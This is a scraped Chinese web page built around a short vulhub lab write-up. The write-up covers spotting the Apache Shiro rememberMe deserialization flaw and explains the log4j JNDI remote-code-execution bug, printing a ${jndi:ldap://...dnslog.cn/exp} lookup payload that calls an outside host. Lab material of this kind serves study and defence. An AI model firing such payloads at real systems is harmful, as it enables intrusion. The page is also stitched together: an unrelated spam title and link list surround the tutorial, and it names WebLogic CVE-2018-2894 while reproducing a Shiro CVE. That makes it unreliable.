当前位置: 首页 > news >正文

网站做词织梦与wordpress

网站做词,织梦与wordpress,最新新闻国内大事件,优化是什么工作文章目录 安装环境shiro漏洞验证log4j 安装环境 进入vulhb目录下的weblogic#xff0c;复现CVE-2018-2894漏洞#xff1a; cd /vulhub/shiro/CVE-2010-3863查看docker-compose的配置文件#xff1a; cat docker-compose.yml如图#xff0c;里面有一个镜像文件的信息和服… 文章目录 安装环境shiro漏洞验证log4j 安装环境 进入vulhb目录下的weblogic复现CVE-2018-2894漏洞 cd /vulhub/shiro/CVE-2010-3863查看docker-compose的配置文件 cat docker-compose.yml如图里面有一个镜像文件的信息和服务名以及它的端口号后面要用 然后使用下面命令搭建docker-compose并启动 sudo docker-compose up -d sudo docker-compose up -d如图安装成功 shiro漏洞验证 原理如下 Apache Shiro框架提供了记住我的功能RememberMe用户登陆成功后会生成经过加密并编码的cookie在服务端接收cookie值后Base64解码–AES解密–反序列化。攻击者只要找到AES加密的密钥就可以构造一个恶意对象对其进行序列化–AES加密–Base64编码然后将其作为cookie的rememberMe字段发送Shiro将rememberMe进行解密并且反序列化最终造成反序列化漏洞。 用bp自带的浏览器打开http://10.9.75.45:8080/随意输入用户名密码并勾选记住我 点击登录后抓包发送到repeat模块发现请求包中有rememberme字段 点击send发送响应包中有set-cookie字段并有rememberMedeleteMe内容这是一个shiro反序列化漏洞的强特征说明有极大的可能存在shiro反序列化 log4j log4jlog for Java是Apache的一个开源项目是一个基于Java的日志记录框架。该漏洞的主要原因是log4j在日志输出中未对字符合法性进行严格的限制执行了JNDI协议加载的远程恶意脚本从而造成RCE。 它是一个RCE命令执行的漏洞,它的日志的输出如下print函数双引号中的内容会被当做字符处理 $user$_GET(user); log.print(“用户$user登录失败”);如果print函数中出现如${jndi:ldap://lof4ot.dnslog.cn/exp}的内容就会将大括号中的内容当做命令执行 如果流量中遇到下面三个关键字极大可能是Java的漏洞攻击 rmi、jndi、ldap
http://www.hkea.cn/news/14296457/

相关文章:

  • 公司网站做好了怎么做排名长春网站排名提升
  • 怎样用dw做 网站首页浏览器网页版免费进入
  • 宝丰网站制作效果好wordpress 滑到底部自动加载
  • 网站建设seo房产管理局信息查询入口
  • 手机网站制作app郑州短视频培训机构
  • 网站开发 项目的招标文件厦门有什么好企业网站
  • asp网站开发技术背景介绍湖北网站建设网址
  • 网站备案提交信息吗做论坛网站好吗
  • 网站域名实名认证闽清住房和城乡建设局网站
  • 佛山建网站公司python 网站开发代码
  • dede 百度网站地图南京做网站公司
  • 做好网站建设一个域名大概能卖多少钱
  • 网站设计需要什么证烟台网站建设工作
  • 企业只有建立自己的网站平台seo网络优化师就业前景
  • 国内做网站的龙头企业做外贸网站选择服务器
  • 网站开发合同注意事件有哪些页面设计文档
  • 源码网站有哪些2022年网络热点事件舆情案例
  • 沂南县建设局网站沙井商城网站建设
  • 鹿城做网站hicloudcom云服务首页
  • 肥西网站建设手机购物网站 建站
  • 光明做网站wordpress修改登录界面
  • 前端个人网站模板明星做代言的购物网站0
  • 做知识问答的网站哈尔滨网页设计推广
  • joomla 2.5:你的网站建设_使用与管理网站打开慢原因
  • 百度站长快速收录绵阳欣诚建设
  • wordpress如何评论苏州关键词优化排名推广
  • 衡水提供网站制作公司哪家专业网络公司名称大全
  • 新的购物网站怎么做流量分析大同市建设工程招标投标网站
  • 石家庄网站建设登录怎么在.Net中做团购网站
  • 小公司做网站赚钱吗帮人负责做网站叫什么工作